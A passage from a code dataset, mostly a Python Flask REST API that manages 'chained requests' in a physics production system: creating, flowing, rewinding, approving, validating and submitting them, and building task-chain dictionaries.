os.path.isfile(ModuleFilePathString):\n\t\t\t\timportlib.import_module(ModuleName);\n\ndef getModuleWithName(_Name):\n\t'''\n\t\tGet a Sys Module With its Name\n\t'''\n\t\"\"\"\n\t\tprint(\"Functor Module is : \");\n\t\tprint(_.getModuleWithName(\"Functor\"));\n\t\"\"\"\n\t\n\t#Import the Module\n\timportModuleWithName(_Name);\n\t\n\t#Get the ModuleName\n\tModuleName=getModuleNameWithName(_Name);\n\t\n\t#Return the Module\n\tif sys.modules.has_key(ModuleName):\n\t\treturn sys.modules[ModuleName];\n\n","sub_path":"Modules/_drafts/Functor/Modules/Getter/Modules/drafts/Classer/Scripts/1_ModuleWithNameGetter/ModuleWithNameGetterScript.py","file_name":"ModuleWithNameGetterScript.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"171093415","text":"#!/usr/bin/env python\n\nimport flask\n\nfrom json import dumps, loads\nfrom couchdb_layer.mcm_database import database\nfrom RestAPIMethod import RESTResource\nfrom json_layer.chained_request import chained_request\nfrom json_layer.request import request\nfrom json_layer.mccm import mccm\nfrom tools.user_management import access_rights\nfrom flask_restful import reqparse\nfrom tools.locker import locker\nfrom ChainedRequestPrepId import ChainedRequestPrepId\n\n\nclass CreateChainedRequest(RESTResource):\n\n access_limit = access_rights.administrator\n\n def __init__(self):\n self.db_name = 'chained_requests'\n self.before_request()\n self.count_call()\n\n def put(self):\n \"\"\"\n Create a chained request from the provided json content\n \"\"\"\n return self.import_request(flask.request.data.strip())\n\n def import_request(self, data):\n db = database(self.db_name)\n json_input = loads(data)\n if 'pwg' not in json_input or 'member_of_campaign' not in json_input:\n self.logger.error('No pwg or 
member of campaign attribute for new chained request')\n return {\"results\": False}\n\n if 'prepid' in json_input:\n req = chained_request(json_input)\n cr_id = req.get_attribute('prepid')\n else:\n cr_id = ChainedRequestPrepId().next_prepid(json_input['pwg'], json_input['member_of_campaign'])\n if not cr_id:\n return {\"results\": False}\n\n req = chained_request(db.get(cr_id))\n for key in json_input:\n if key not in ['prepid', '_id', '_rev', 'history']:\n req.set_attribute(key, json_input[key])\n if not req.get_attribute('prepid'):\n self.logger.error('prepid returned was None')\n raise ValueError('Prepid returned was None')\n\n if 'chain_type' in json_input:\n chain_type = json_input['chain_type']\n else:\n ccdb = database('chained_campaigns')\n chain_type = ccdb.get(json_input['member_of_campaign']).get('chain_type', 'TaskChain')\n\n req.set_attribute('chain_type', chain_type)\n self.logger.info('Created new chained_request %s' % cr_id)\n # update history with the submission details\n req.update_history({'action': 'created'})\n return self.save_request(db, req)\n\n def save_request(self, db, req):\n if not db.document_exists(req.get_attribute('_id')):\n if db.save(req.json()):\n self.logger.info('new chained_request successfully saved.')\n return {\"results\": True, \"prepid\": req.get_attribute('prepid')}\n else:\n self.logger.error('Could not save new chained_request to database')\n return {\"results\": False}\n else:\n if db.update(req.json()):\n self.logger.info('new chained_request successfully saved.')\n return {\"results\": True, \"prepid\": req.get_attribute('prepid')}\n else:\n self.logger.error('Could not save new chained_request to database')\n return {\"results\": False}\n\n\nclass UpdateChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.db_name = 'chained_requests'\n self.before_request()\n self.count_call()\n\n def put(self):\n \"\"\"\n Update a chained request from the provided json content\n \"\"\"\n return self.update_request(flask.request.data)\n\n def update_request(self, data):\n if '_rev' not in data:\n return {\"results\": False, 'message': 'There is no previous revision provided'}\n\n try:\n chained_req = chained_request(json_input=loads(data))\n except chained_request.IllegalAttributeName:\n return {\"results\": False}\n\n prepid = chained_req.get_attribute('prepid')\n if not prepid and not chained_req.get_attribute('_id'):\n raise ValueError('Prepid returned was None')\n\n db = database(self.db_name)\n previous_version = chained_request(json_input=db.get(prepid))\n self.logger.info('Updating chained_request %s', prepid)\n new_priority = chained_req.get_attribute('action_parameters')['block_number']\n chained_req.set_priority(new_priority)\n # update history\n difference = self.get_obj_diff(previous_version.json(),\n chained_req.json(),\n ('history', '_rev'))\n difference = ', '.join(difference)\n chained_req.update_history({'action': 'update', 'step': difference})\n return {\"results\": db.update(chained_req.json())}\n\n\nclass DeleteChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def delete(self, chained_request_id):\n \"\"\"\n Simply delete a chained requests\n \"\"\"\n return self.delete_request(chained_request_id)\n\n def delete_request(self, crid):\n\n crdb = database('chained_requests')\n rdb = database('requests')\n mcm_cr = chained_request(crdb.get(crid))\n if 
mcm_cr.get_attribute('action_parameters')['flag']:\n return {\"results\": False,\n \"message\": \"Chained request %s is not disabled\" % (crid)}\n # get all objects\n mcm_r_s = []\n chain = mcm_cr.get_attribute('chain')\n for rid in reversed(chain):\n i = chain.index(rid)\n mcm_r = request(rdb.get(rid))\n in_chains = mcm_r.get_attribute('member_of_chain')\n if crid in in_chains:\n in_chains.remove(crid)\n self.logger.debug(\"Removing %s from member_of_chain of %s\", crid, rid)\n mcm_r.set_attribute('member_of_chain', in_chains)\n\n if not in_chains:\n # Last chain that had that request\n approval = mcm_r.get_attribute('approval')\n status = mcm_r.get_attribute('status')\n if i == 0 and approval == 'submit':\n # Root request that is submitted or done, must be reset first\n return {\"results\": False,\n \"message\": \"Root request %s, in %s-%s will not be chained anymore\" % (rid, approval, status)}\n if i != 0:\n # Not root request can't exist without a chain\n return {\"results\": False,\n \"message\": \"Not-root request %s will not be chained anymore\" % (rid)}\n\n mcm_r.update_history({'action': 'leave', 'step': crid})\n mcm_r_s.append(mcm_r)\n # then save all changes\n for mcm_r in mcm_r_s:\n if not rdb.update(mcm_r.json()):\n return {\"results\": False, \"message\": \"Could not save request \" + mcm_r.get_attribute('prepid')}\n\n return {\"results\": crdb.delete(crid)}\n\n\nclass GetChainedRequest(RESTResource):\n def __init__(self):\n self.db_name = 'chained_requests'\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id):\n \"\"\"\n Retrieve the content of a chained request id\n \"\"\"\n return self.get_request(chained_request_id)\n\n def get_request(self, data):\n db = database(self.db_name)\n if ',' in data:\n rlist = data.rsplit(',')\n res = []\n for rid in rlist:\n tmp_data = db.get(prepid=rid)\n if len(tmp_data) > 0:\n res.append(tmp_data)\n return {\"results\": res}\n else:\n return {\"results\": db.get(prepid=data)}\n\n\n# REST method that makes the chained request flow to the next\n# step of the chain\nclass FlowToNextStep(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def put(self):\n \"\"\"\n Allows to flow a chained request with the dataset and blocks provided in the json\n \"\"\"\n return self.flow2(loads(flask.request.data))\n\n def get(self, chained_request_id, action='', reserve_campaign=''):\n \"\"\"\n Allow to flow a chained request with internal information\n \"\"\"\n check_stats = True\n reserve = False\n if action != '':\n check_stats = (action != 'force')\n reserve = (action == 'reserve')\n if reserve_campaign != '':\n reserve = reserve_campaign\n\n return self.multiple_flow(chained_request_id, check_stats, reserve)\n\n def multiple_flow(self, rid, check_stats=True, reserve=False):\n if ',' in rid:\n chain_id_list = rid.rsplit(',')\n else:\n chain_id_list = [rid]\n res = []\n chains_requests_dict = {}\n for chain_id in chain_id_list:\n flow_results = self.flow(chain_id, check_stats=check_stats, reserve=reserve)\n if flow_results['results'] and 'generated_requests' in flow_results:\n chains_requests_dict[chain_id] = flow_results['generated_requests']\n flow_results.pop('generated_requests')\n res.append(flow_results)\n if len(chains_requests_dict):\n chain_id = chains_requests_dict.iterkeys().next()\n mccm_ticket = mccm.get_mccm_by_generated_chain(chain_id)\n if mccm_ticket is not None:\n 
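# push the newly generated chained requests back onto the MccM ticket that\n # spawned them, keeping the ticket's generated_chains mapping up to date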
mccm_ticket.update_mccm_generated_chains(chains_requests_dict)\n if len(res) == 1:\n return res[0]\n return res\n\n def flow2(self, data):\n db = database('chained_requests')\n chain_id = data['prepid']\n try:\n creq = chained_request(json_input=db.get(chain_id))\n except Exception as ex:\n self.logger.error('Could not initialize chained_request object. Reason: %s' % (ex))\n return {\"results\": str(ex)}\n\n self.logger.info('Attempting to flow to next step for chained_request %s' % (\n creq.get_attribute('_id')))\n\n # if the chained_request can flow, do it\n inputds = ''\n inblack = []\n inwhite = []\n check_stats = True\n if 'input_dataset' in data:\n inputds = data['input_dataset']\n if 'block_black_list' in data:\n inblack = data['block_black_list']\n if 'block_white_list' in data:\n inwhite = data['block_white_list']\n if 'force' in data:\n check_stats = data['force'] != 'force'\n if 'reserve' in data and data[\"reserve\"]:\n reserve = data[\"reserve\"]\n return creq.reserve(limit=reserve)\n return creq.flow_trial(inputds, inblack, inwhite, check_stats)\n\n def flow(self, chainid, check_stats=True, reserve=False):\n try:\n db = database('chained_requests')\n creq = chained_request(json_input=db.get(chainid))\n except Exception as ex:\n self.logger.error('Could not initialize chained_request object. Reason: %s' % (ex))\n return {\"results\": str(ex)}\n\n # TO-DO check if chained_request is in settings forceflow_list and remove it!\n # if the chained_request can flow, do it\n if reserve:\n self.logger.info('Attempting to reserve to next step for chained_request %s' % (\n creq.get_attribute('_id')))\n return creq.reserve(limit=reserve, save_requests=False)\n\n self.logger.info('Attempting to flow to next step for chained_request %s' % (\n creq.get_attribute('_id')))\n return creq.flow_trial(check_stats=check_stats)\n\n\nclass RewindToPreviousStep(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_ids):\n \"\"\"\n Rewind the provided comma-separated chained requests by one step.\n \"\"\"\n res = []\n crids = chained_request_ids.split(\",\")\n for crid in crids:\n res.append(self.rewind_one(crid))\n\n if len(res) != 1:\n return res\n else:\n return res[0]\n\n def rewind_one(self, crid):\n crdb = database('chained_requests')\n if not crdb.document_exists(crid):\n return {'results': False,\n 'message': '%s does not exist' % (crid),\n 'prepid': crid}\n\n mcm_cr = chained_request(crdb.get(crid))\n current_step = mcm_cr.get_attribute('step')\n if current_step == 0:\n return {'results': False,\n 'message': '%s already at the root' % (crid),\n 'prepid': crid}\n\n rdb = database('requests')\n current_prepid = mcm_cr.get_attribute('chain')[current_step]\n # Check if all other requests at all other chains are already reset\n # Check if all other chains have same request as current step\n current_request = request(rdb.get(current_prepid))\n chain_prepids = current_request.get_attribute('member_of_chain')\n chained_reqs = [chained_request(crdb.get(cr)) for cr in chain_prepids]\n # Simple check first\n for chained_req in chained_reqs:\n if chained_req.get_attribute('prepid') == crid:\n continue\n\n chained_req_id = chained_req.get_attribute('prepid')\n chained_req_step = chained_req.get_attribute('step')\n chained_req_chain = chained_req.get_attribute('chain')\n if chained_req_chain.index(current_prepid) < chained_req_step:\n return {'results': False,\n 'message': 'Rewind %s first' % (chained_req_id),\n 
'prepid': crid}\n\n # More demanding request check\n for chained_req in chained_reqs:\n chained_req_id = chained_req.get_attribute('prepid')\n chained_req_step = chained_req.get_attribute('step')\n chained_req_chain = chained_req.get_attribute('chain')\n # Only leave requests after the \"current\" request\n chained_req_chain = chained_req_chain[chained_req_chain.index(current_prepid) + 1:]\n for next_req_id in reversed(chained_req_chain):\n # what if that next one is not in the db\n if not rdb.document_exists(next_req_id):\n raise Exception('%s is part of %s but does not exist' % (next_req_id,\n chained_req_id))\n\n req = rdb.get(next_req_id)\n req_status = req['status']\n if req_status != 'new':\n message = '%s is after the %s and is not \"new\", but \"%s\"' % (next_req_id,\n current_prepid,\n req_status)\n self.logger.error(message)\n return {'results': False,\n 'message': message,\n 'prepid': crid}\n\n # Move step back in all chained requests\n for chained_req in chained_reqs:\n chained_req_id = chained_req.get_attribute('prepid')\n chained_req_step = chained_req.get_attribute('step')\n chained_req_chain = chained_req.get_attribute('chain')\n chained_req.set_attribute('step', chained_req_chain.index(current_prepid) - 1)\n chained_req.set_last_status()\n chained_req.set_attribute('status', 'processing')\n saved = crdb.update(chained_req.json())\n if not saved:\n return {\n \"results\": False,\n \"message\": \"could not save %s\" % (chained_req_id),\n \"prepid\": crid}\n\n current_request.reset()\n current_request.set_attribute('input_dataset', '')\n saved = rdb.update(current_request.json())\n if not saved:\n return {'results': False,\n 'message': 'could not save %s' % (current_prepid),\n 'prepid': crid}\n\n\n return {\"results\": True, \"prepid\": crid}\n\n\nclass RewindToRoot(RewindToPreviousStep):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_ids):\n \"\"\"\n Rewind the provided coma separated chained requests to the root request\n \"\"\"\n res = []\n crdb = database('chained_requests')\n crids = chained_request_ids.split(\",\")\n for crid in crids:\n ch_request = chained_request(crdb.get(crid))\n if not ch_request:\n res.append({\"results\": False, \"message\": \"does not exist\", \"prepid\": crid})\n continue\n\n step = ch_request.get_attribute('step')\n for i in range(0, step):\n res_one = self.rewind_one(crid)\n if not res_one['results']:\n res.append(res_one)\n break\n else:\n res.append({'results': True, 'prepid': crid})\n\n if len(res) != 1:\n return res\n else:\n return res[0]\n\n\nclass ApproveChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id, step=-1):\n \"\"\"\n move the chained request approval to the next step\n \"\"\"\n return self.multiple_approve(chained_request_id, step)\n\n def multiple_approve(self, rid, val=-1):\n if ',' in rid:\n rlist = rid.rsplit(',')\n res = []\n for r in rlist:\n res.append(self.approve(r, val))\n return res\n else:\n return self.approve(rid, val)\n\n def approve(self, rid, val=-1):\n db = database('chained_requests')\n if not db.document_exists(rid):\n return {\"prepid\": rid, \"results\": 'Error: The given chained_request id does not exist.'}\n creq = chained_request(json_input=db.get(rid))\n try:\n creq.approve(val)\n except Exception as ex:\n return {\"prepid\": rid, \"results\": False, 'message': 
str(ex)}\n\n saved = db.update(creq.json())\n if saved:\n return {\"prepid\": rid, \"results\": True}\n else:\n return {\n \"prepid\": rid,\n \"results\": False,\n 'message': 'unable to save the updated chained request'}\n\n\nclass InspectChain(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id):\n \"\"\"\n Inspect a chained request for next action\n \"\"\"\n return self.multiple_inspect(chained_request_id)\n\n def multiple_inspect(self, crid):\n crlist = crid.rsplit(',')\n res = []\n crdb = database('chained_requests')\n for cr in crlist:\n if crdb.document_exists(cr):\n mcm_cr = chained_request(crdb.get(cr))\n res.append(mcm_cr.inspect())\n else:\n res.append({\"prepid\": cr, \"results\": False, 'message': '%s does not exist' % cr})\n\n if len(res) > 1:\n return res\n else:\n return res[0]\n\n\nclass SearchableChainedRequest(RESTResource):\n\n access_limit = access_rights.user\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, action=''):\n \"\"\"\n Return a document containing several usable values that can be searched and the value can be find. /do will trigger reloading of that document from all requests\n \"\"\"\n rdb = database('chained_requests')\n if action == 'do':\n all_requests = rdb.get_all()\n searchable = {}\n for request in all_requests:\n for key in [\"prepid\", \"approval\", \"status\", \"pwg\", \"step\",\n \"last_status\", \"member_of_campaign\", \"dataset_name\"]:\n if key not in searchable:\n searchable[key] = set([])\n if not key in request:\n # that should make things break down, and due to schema evolution missed-migration\n continue\n if type(request[key]) == list:\n for item in request[key]:\n searchable[key].add(str(item))\n else:\n searchable[key].add(str(request[key]))\n\n # unique it\n for key in searchable:\n searchable[key] = list(searchable[key])\n searchable[key].sort()\n\n # store that value\n search = database('searchable')\n if search.document_exists('chained_requests'):\n search.delete('chained_requests')\n searchable.update({'_id': 'chained_requests'})\n search.save(searchable)\n searchable.pop('_id')\n return searchable\n else:\n # just retrieve that value\n search = database('searchable')\n searchable = search.get('chained_requests')\n searchable.pop('_id')\n searchable.pop('_rev')\n return searchable\n\n\nclass TestChainedRequest(RESTResource):\n\n access_limit = access_rights.generator_contact\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id):\n \"\"\"\n Perform test for chained requests\n \"\"\"\n crdb = database('chained_requests')\n rdb = database('requests')\n settingsDB = database('settings')\n mcm_cr = chained_request(crdb.get(chained_request_id))\n if settingsDB.get('validation_stop')['value']:\n return {\n \"results\": False,\n 'message': ('validation jobs are halted to allow forthcoming mcm ''restart - try again later'),\n \"prepid\": chained_request_id}\n requires_validation = False\n for rid in mcm_cr.get_attribute('chain')[mcm_cr.get_attribute('step'):]:\n mcm_r = request(rdb.get(rid))\n if not mcm_r.is_root and 'validation' not in mcm_r._json_base__status: # We dont care about non root request because they are not being used on chain run test\n break\n requires_validation = True\n if mcm_r.get_attribute('status') != 'new' or mcm_r.get_attribute('approval') != 'none':\n return {\n \"results\": False,\n \"prepid\": 
chained_request_id,\n \"message\": \"request %s is in status %s, approval: %s\" % (rid, mcm_r.get_attribute('status'), mcm_r.get_attribute('approval'))}\n try:\n mcm_r.ok_to_move_to_approval_validation(for_chain=True)\n mcm_r.update_history({'action': 'approve', 'step': 'validation'})\n mcm_r.set_attribute('approval', 'validation')\n mcm_r.reload()\n text = 'Within chain %s \\n' % mcm_cr.get_attribute('prepid')\n text += mcm_r.textified()\n subject = 'Approval %s in chain %s for request %s' % ('validation', mcm_cr.get_attribute('prepid'), mcm_r.get_attribute('prepid'))\n mcm_r.notify(subject, text, accumulate=True)\n except Exception as e:\n mcm_cr.reset_requests(str(e), notify_one=rid)\n return {\n \"results\": False,\n \"message\": str(e),\n \"prepid\": chained_request_id}\n if not requires_validation:\n return {\n \"results\": True,\n \"message\": \"No validation required\",\n \"prepid\": chained_request_id}\n mcm_cr.set_attribute('validate', 1)\n mcm_cr.update_history({'action': 'validate'})\n if not crdb.update(mcm_cr.json()):\n return {\n \"results\": False,\n \"message\": \"Failed while trying to update the document in DB\",\n \"prepid\": chained_request_id}\n return {\n \"results\": True,\n \"message\": \"run test will start soon\",\n \"prepid\": chained_request_id}\n\n\nclass SoftResetChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self, mode='show'):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id):\n \"\"\"\n Does a soft reset to all relevant request in the chain\n \"\"\"\n crdb = database('chained_requests')\n rdb = database('requests')\n\n mcm_cr = chained_request(crdb.get(chained_request_id))\n for rid in reversed(mcm_cr.get_attribute('chain')[:mcm_cr.get_attribute('step') + 1]):\n # from the current one to the first one REVERSED\n mcm_r = request(rdb.get(rid))\n try:\n mcm_r.reset(hard=False)\n except Exception as e:\n return {'prepid': chained_request_id, 'results': False, 'message': str(e)}\n\n mcm_r.reload()\n mcm_cr = chained_request(crdb.get(chained_request_id))\n mcm_cr.set_attribute('step', max(0, mcm_cr.get_attribute('chain').index(rid) - 1))\n mcm_cr.reload()\n\n return {'prepid': chained_request_id, 'results': True}\n\n\nclass InjectChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n self.mode = 'show' if 'get_inject' in flask.request.path else 'inject'\n\n def get(self, chained_request_id):\n \"\"\"\n Provides the injection command and does the injection.\n \"\"\"\n from tools.handlers import ChainRequestInjector, submit_pool\n\n _q_lock = locker.thread_lock(chained_request_id)\n if not locker.thread_acquire(chained_request_id, blocking=False):\n return {\"prepid\": chained_request_id, \"results\": False,\n \"message\": \"The request {0} request is being handled already\".format(\n chained_request_id)}\n\n thread = ChainRequestInjector(prepid=chained_request_id, lock=locker.lock(chained_request_id), queue_lock=_q_lock,\n check_approval=False)\n if self.mode == 'show':\n self.representations = {'text/plain': self.output_text}\n return thread.make_command()\n else:\n submit_pool.add_task(thread.internal_run)\n return {\n \"results\": True,\n \"message\": \"chain submission for %s will be forked unless same request is being handled already\" % chained_request_id,\n \"prepid\": chained_request_id}\n\n\nclass ChainsFromTicket(RESTResource):\n\n access_limit = access_rights.user\n\n def 
__init__(self):\n self.before_request()\n self.count_call()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('ticket', type=str, required=True)\n self.parser.add_argument('page', type=int, default=0)\n self.parser.add_argument('limit', type=int, default=20)\n\n def get(self):\n \"\"\"\n Get all the generated chains from a ticket\n \"\"\"\n kwargs = self.parser.parse_args()\n page = kwargs['page']\n limit = kwargs['limit']\n if page < 0:\n page = 0\n limit = 999999\n\n ticket_prepid = kwargs['ticket']\n chained_requests_db = database('chained_requests')\n mccms_db = database('mccms')\n result = mccms_db.search({'prepid': ticket_prepid}, page=-1)\n if len(result) == 0:\n self.logger.warning(\"Mccm prepid %s doesn't exit in db\" % ticket_prepid)\n return {}\n self.logger.info(\"Getting generated chains from ticket %s\" % ticket_prepid)\n generated_chains = list(result[0]['generated_chains'].iterkeys())\n generated_chains.sort()\n start = page * limit\n if start > len(generated_chains):\n return []\n end = start + limit\n end = end if end <= len(generated_chains) else len(generated_chains)\n chained_request_list = []\n while start < end:\n fetch_till = start + 20\n fetch_till = end if fetch_till > end else fetch_till\n chained_request_list += chained_requests_db.search({'prepid': generated_chains[start:fetch_till]})\n start += 20\n return chained_request_list\n\n\nclass TaskChainDict(RESTResource):\n\n access_limit = access_rights.user\n\n def __init__(self):\n self.before_request()\n self.count_call()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('scratch', type=str)\n self.parser.add_argument('upto', type=int)\n self.representations = {'text/plain': self.output_text}\n\n def get(self, chained_request_id):\n \"\"\"\n Provide the taskchain dictionnary for uploading to request manager\n \"\"\"\n kwargs = self.parser.parse_args()\n crdb = database('chained_requests')\n rdb = database('requests')\n settingsDB = database('settings')\n\n __DT_prio = settingsDB.get('datatier_input')[\"value\"]\n\n def tranform_to_step_chain(wma_dict, total_time_evt, total_size_evt):\n # replace Task -> Step in inside dictionaries\n for task_num in range(wma_dict[\"TaskChain\"]):\n for elem in wma_dict[\"Task%s\" % (task_num + 1)]:\n if \"Task\" in elem:\n wma_dict[\"Task%s\" % (task_num + 1)][elem.replace(\"Task\", \"Step\")] = wma_dict[\"Task%s\" % (task_num + 1)].pop(elem)\n\n # we later add the global fields\n del(wma_dict[\"Task%s\" % (task_num + 1)][\"TimePerEvent\"])\n del(wma_dict[\"Task%s\" % (task_num + 1)][\"SizePerEvent\"])\n\n # we do same replacement on top level\n for el in wma_dict:\n if wma_dict[el].__class__ == str and \"task\" in wma_dict[el]:\n wma_dict[el] = wma_dict[el].replace(\"task\", \"step\")\n\n if \"Task\" in el:\n wma_dict[el.replace(\"Task\", \"Step\")] = wma_dict.pop(el)\n\n wma_dict[\"RequestType\"] = \"StepChain\"\n\n # as of 2017-05 StepChain needs these as sum of internal Tasks\n wma_dict[\"TimePerEvent\"] = total_time_evt\n wma_dict[\"SizePerEvent\"] = total_size_evt\n\n return wma_dict\n\n if not crdb.document_exists(chained_request_id):\n # it's a request actually, pick up all chains containing it\n mcm_r = rdb.get(chained_request_id)\n mcm_crs = crdb.query_view('contains', chained_request_id, page_num=-1)\n task_name = 'task_' + chained_request_id\n else:\n mcm_crs = [crdb.get(chained_request_id)]\n # here name should be task_chain's[curr_step] request_prepid\n # so it would be task_prepid-of-current-request same as in top\n __req_id = 
mcm_crs[0]['chain'][mcm_crs[0]['step']]\n task_name = 'task_' + __req_id\n\n if len(mcm_crs) == 0:\n return {}\n\n tasktree = {}\n ignore_status = False\n __total_time_evt = 0\n __total_size_evt = 0\n\n if kwargs['scratch'] is not None:\n ignore_status = True\n\n veto_point = None\n if kwargs['upto'] is not None:\n veto_point = kwargs['upto']\n\n __chains_type = []\n for mcm_cr in mcm_crs:\n __chains_type.append(mcm_cr[\"chain_type\"])\n starting_point = mcm_cr['step']\n if ignore_status:\n starting_point = 0\n for (ir, r) in enumerate(mcm_cr['chain']):\n if (ir < starting_point):\n continue # ad no task for things before what is already done\n if veto_point and (ir > veto_point):\n continue\n mcm_r = request(rdb.get(r))\n if mcm_r.get_attribute('status') == 'done' and not ignore_status:\n continue\n\n if r not in tasktree:\n tasktree[r] = {'next': [], 'dict': [], 'rank': ir}\n\n base = ir == 0 and mcm_r.get_wmagent_type() in ['MonteCarlo', 'LHEStepZero']\n depend = (ir > starting_point) # all the ones later than the starting point depend on a previous task\n if ir < (len(mcm_cr['chain']) - 1):\n tasktree[r]['next'].append(mcm_cr['chain'][ir + 1])\n\n tasktree[r]['dict'] = mcm_r.request_to_tasks(base, depend)\n # if request is added to tasktree, we save global sums for StepChains\n __total_time_evt += mcm_r.get_sum_time_events()\n __total_size_evt += sum(mcm_r.get_attribute(\"size_event\"))\n\n for (r, item) in tasktree.items():\n # here we should generate unique list of steps+output tiers\n # as we iterate over requests in tasktree\n __uniq_tiers = []\n for el in item['dict']:\n # map of tiers and taskID in order of steps\n __uniq_tiers.append((el['TaskName'], el['_output_tiers_']))\n\n item['unique_tiers_'] = __uniq_tiers\n for n in item['next']:\n # here we should take input from datatier selection;\n # have a map of tiers -> taskNames and select appropriate one\n __input_tier = tasktree[n]['dict'][0]['_first_step_']\n tModule = tName = \"\"\n if __input_tier in __DT_prio:\n # in case there is a possible DataTier in global_dict\n tModule, tName = request.do_datatier_selection(__DT_prio[__input_tier], __uniq_tiers)\n\n if tModule != \"\" and tName != \"\":\n tasktree[n]['dict'][0].update({\"InputFromOutputModule\": tModule, \"InputTask\": tName})\n else:\n # default & fallback solution\n tasktree[n]['dict'][0].update({\"InputFromOutputModule\": item['dict'][-1]['output_'],\n \"InputTask\": item['dict'][-1]['TaskName']})\n\n wma = {\n \"RequestType\": \"TaskChain\",\n \"Group\": \"ppd\",\n \"Requestor\": \"pdmvserv\",\n \"TaskChain\": 0,\n \"ProcessingVersion\": 1,\n \"RequestPriority\": 0,\n \"SubRequestType\": \"MC\",\n # we default to 1 in multicore global\n \"Multicore\": 1}\n\n task = 1\n pilot_string = None\n for (r, item) in sorted(tasktree.items(), key=lambda d: d[1]['rank']):\n for d in item['dict']:\n if d['priority_'] > wma['RequestPriority']:\n wma['RequestPriority'] = d['priority_']\n if d['request_type_'] in ['ReDigi']:\n wma['SubRequestType'] = 'ReDigi'\n\n if d.get('pilot_'):\n pilot_string = d['pilot_']\n\n for k in d.keys():\n if k.endswith('_'):\n d.pop(k)\n wma['Task%d' % task] = d\n task += 1\n\n if pilot_string:\n wma['SubRequestType'] = pilot_string\n\n wma['TaskChain'] = task - 1\n if wma['TaskChain'] == 0:\n return dumps({})\n\n for item in ['CMSSWVersion', 'ScramArch', 'TimePerEvent', 'SizePerEvent', 'GlobalTag', 'Memory']:\n wma[item] = wma['Task%d' % wma['TaskChain']][item]\n\n # since 2016-11, processingString and AcquisitionEra is mandatory in global params\n 
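# (both values are copied from Task1 below, which carries the chain's root\n # settings, so the top-level dictionary validates in request manager)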
wma['AcquisitionEra'] = wma['Task1']['AcquisitionEra']\n wma['ProcessingString'] = wma['Task1']['ProcessingString']\n wma['Campaign'] = wma['Task1']['Campaign']\n wma['PrepID'] = task_name\n wma['RequestString'] = wma['PrepID']\n if __chains_type.count(\"StepChain\") == len(__chains_type):\n return dumps(tranform_to_step_chain(wma, __total_time_evt, __total_size_evt), indent=4)\n else:\n return dumps(wma, indent=4)\n\n\nclass GetSetupForChains(RESTResource):\n\n access_limit = access_rights.user\n\n def __init__(self):\n path = flask.request.path\n if 'get_setup' in path:\n self.opt = 'setup'\n elif 'get_test' in path:\n self.opt = 'test'\n elif 'get_valid' in path:\n self.opt = 'valid'\n self.access_limit = access_rights.administrator\n else:\n raise Exception('Cannot create this resource with mode %s' % path)\n\n self.before_request()\n self.count_call()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('scratch', type=str, default='')\n self.kwargs = self.parser.parse_args()\n self.representations = {'text/plain': self.output_text}\n\n def get(self, chained_request_id):\n \"\"\"\n Retrieve the script necessary to setup and test a given chained request\n get_setup - returns file for config generation for submission\n get_test - returns file for user validation\n get_valid - returns file for automatic validation\n \"\"\"\n crdb = database('chained_requests')\n if not crdb.document_exists(chained_request_id):\n return {\"results\": False,\n \"message\": \"Chained request with prepid {0} does not exist\".format(chained_request_id)}\n\n chained_req = chained_request(crdb.get(chained_request_id))\n from_scratch = self.kwargs.get('scratch', '').lower() == 'true'\n for_validation = self.opt in ('test', 'valid')\n automatic_validation = self.opt == 'valid'\n return chained_req.get_setup(for_validation=for_validation,\n automatic_validation=automatic_validation,\n scratch=from_scratch)\n\n\nclass ForceChainReqToDone(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.crdb = database('chained_requests')\n self.ldb = database('lists')\n self.before_request()\n self.count_call()\n self.representations = {'text/plain': self.output_text}\n\n def get(self, chained_request_ids):\n \"\"\"\n Force chained_request to set status to done\n \"\"\"\n if ',' in chained_request_ids:\n rlist = chained_request_ids.rsplit(',')\n res = []\n success = True\n for r in rlist:\n result = self.force_status_done(r)\n success = success and result.get('results', False)\n res.append(result)\n return dumps({'results': success, 'message': res}, indent=4)\n else:\n return dumps(self.force_status_done(chained_request_ids), indent=4)\n\n def force_status_done(self, prepid):\n if not self.crdb.document_exists(prepid):\n return dumps({\"results\": False, \"message\": \"Chained request with prepid {0} does not exist\".format(prepid)}, indent=4)\n cr = chained_request(self.crdb.get(prepid))\n if not (cr.get_attribute(\"status\") in [\"done\", \"force_done\"]):\n cr.set_status(to_status=\"force_done\")\n cr.remove_from_nonflowing_list()\n self.logger.debug(\"forcing chain_req status to done. 
